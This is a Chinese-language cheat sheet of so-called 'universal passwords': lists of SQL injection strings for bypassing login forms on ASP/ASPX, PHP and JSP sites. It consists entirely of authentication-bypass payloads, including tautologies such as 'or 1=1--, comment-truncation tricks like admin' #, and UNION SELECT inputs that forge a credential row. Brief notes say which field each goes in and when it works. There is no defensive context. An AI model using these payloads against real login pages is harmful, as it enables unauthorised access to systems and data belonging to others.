asp aspx万能密码
"or "a"="a
')or('a'='a
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 1=1
'OR 1=1%00
"or 1=1%00
'xor
新型万能登陆密码
用户名 ' UNION Select 1,1,1 FROM admin Where ''=' （替换表名admin）
密码 1

Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
Password=1

admin' or 'a'='a 密码随便

PHP万能密码
'or'='or'
'or 1=1/* 字符型 GPC是否开都可以使用
User: something  Pass: ' OR '1'='1
admin'/*  密码*/'
"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or"="a'='a
'or' '1'='1'
'or''='
'or''=''or''='
'or'='1'
'or.'a.'='a
'or1=1--
1'or'1'='1
a'or' 1=1--
a'or'1=1--
or 'a'='a'
or 1=1--
or1=1--
admin' #

jsp万能密码
1'or'1'='1
admin' OR 1=1/*
用户名：admin 系统存在这个用户的时候才用得上 密码：1'or'1'='1